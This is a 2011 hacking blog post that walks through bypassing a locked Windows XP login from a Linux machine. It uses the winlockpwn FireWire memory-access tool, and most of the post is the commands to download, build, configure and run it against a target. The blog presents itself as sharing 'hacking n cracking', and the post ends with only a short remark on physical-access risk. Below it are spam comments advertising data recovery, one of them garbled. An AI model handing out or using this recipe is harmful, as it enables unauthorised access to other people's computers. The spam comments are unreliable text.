Welcome to my site. Please CLICK HERE to give your opinions regarding this new look of "PCTipsbyAnu". Thanks for visiting.

Friday, April 8, 2011

Browse » Home » , , , , , , , » How to hack Windows PC using Linux in seconds?

How to hack Windows PC using Linux in seconds?

In this tutorial i'll gives you the way to hack a Windows PC within seconds from Linux....

winlockpwn is a memory analysis tool. This utility exploits firewire’s direct memory access. The operating system allows firewire devices to directly read/write memory without having to go through the processor. Sounds handy right? I installed winlockpwn on Ubuntu 7.10 and a fully patched Windows XP SP2 box. The first step is to download the required libraries:
sudo aptitude install libdc1394-13 libraw1394-dev swig python
Now we need to download and install Python 2.3 because I tried to run it using Python 2.5 with no success:
wget http://www.python.org/ftp/python/2.3.6/Python-2.3.6.tgz

tar -zxvf Python-2.3.6.tgz

cd Python-2.3.6



sudo make install
The next step is to modify libraw1394:
sudo vim /usr/include/libraw1394/raw1394.h
At this point go ahead and search for “__attribute__((deprecated));” in the file raw1394.h and comment out every line that contains it. 

Hint: don’t forget to end the line above it with a semi-colon. Once you comment all of them out, save and close the file. 

The next step is to get the pythonraw1394 library. It contains the python bindings for libraw1394, romtool, and businfo.
wget http://www.storm.net.nz/static/files/pythonraw1394-1.0.tar.gz
And of course, we need to untar it
tar -zxvf pythonraw1394-1.0.tar.gz
Now we need to go into the untared directory and download the actual winlockpwn script:
cd pythonraw1394

wget http://www.storm.net.nz/static/files/winlockpwn
The winlockpwn script needs to be in the pythonraw1394 directory or it wont work without modifying the code. Also, we need to make it executable:
chmod +x winlockpwn
Now we also need to edit the Makefile for pythonraw1394 to point it to python 2.3′s include directory:
sudo vim Makefile
Now change /usr/include/python2.3 to /usr/local/include/python2.3 on lines 5 and 6. Again, save and quit and compile it with the following command:
sudo make
The raw1394 module also needs to also be loaded and the permissions changed on the raw1394 devices:
sudo modprobe raw1394

sudo chmod 666 /dev/raw1394
Now we need to plug into the windows machine and then edit the romtool to reflect the location of python:
sudo vim romtool
Change #!/usr/bin/python to #!/usr/local/bin/python on the first line one of the file.
Repeat the same step for the winlockpwn script as well.
And then load the ipod image onto the firewire port.
./romtool -s 0 ipod.csr
Loading the ipod image onto the firewire port basically fools windows into thinking your linux box is an ipod.
Now we can run businfo to make sure the ipod image is loaded and on what port number it is on as well as making sure you can see your computer on the other end. Mine showed the ipod image loaded onto port number 0 and my windows box on node number 1.
Now, the fun part! Run winlockpwn as follows:
winlockpwn port node target
Mine looked like this:
./winlockpwn 0 1 1
Once you run winlockpwn, the windows box will accept any password you choose to give it (even a blank password) and unlock the system for you.

There are many security issues that arise from winlockpwn. What is to stop one of the janitorial staff from getting into the CEO’s office after hours and immediately getting access to his box because all he did was lock it before he went home? It just goes to show that once someone gains physical access, game over.

If you got an error during ./configure “… g++ cant create executables..”
aptitude install build-essential

You can leave a response, or trackback from your own site.

About 'Anu': My name is 'Anu' also Known as 'ANU 007 TIGER' .I'm administrator of 'PC Tips by Anu' blog .This blog was opened for sharing contents about hacking n cracking.


Anonymous said...

thank you buddy. keep it up

Anonymous said...

When your hard drive fails to work, all your files will be
gone. Develop An IT Asset Database - Whether you are the individual that controls your organization's IT equipment or not, understand the precise hardware that your role makes you responsible for. However, there are many situations where the above method fails to master the startup problem. Trusting an expert for Mac data recovery is always the best choice, and you'll thank yourself for it.
Also see my site: data recovery software mac

Anonymous said...

On Glass windows centered computer systems іt mаy be
a real discοmfort, because they dο not get еνerything to do that along wіth automagically.
Foг that reasοn, hoω bіg thе 'Differential' copу іs aсtually fractionally small ωhen сomparеd ωith any 'Normal' backup
along ωith the who's takes to build and also keep a 'Diffeгential' back up is minimum compared to the which it would likely choose to use generate an additional 'Normal' copy arranged. As a result, the eco-system with regard to data base management is convenient and acts in addition as a possible different recovery facilities with regard to corporate and business, public market sectors along with other big agencies. The customized data recovery support of Stellar is the better associated with data recovery business which is presented in Class Hundred Clean Areas by simply highly skilled and skilled data recovery experts. best data recovery Not every one of all of us are computer geniuses. A treadmill from the dividers isn't recognized by the aсtual BIOS :
It may be anуthing at all.
my web page :: best data recovery

Post a Comment

Back to Top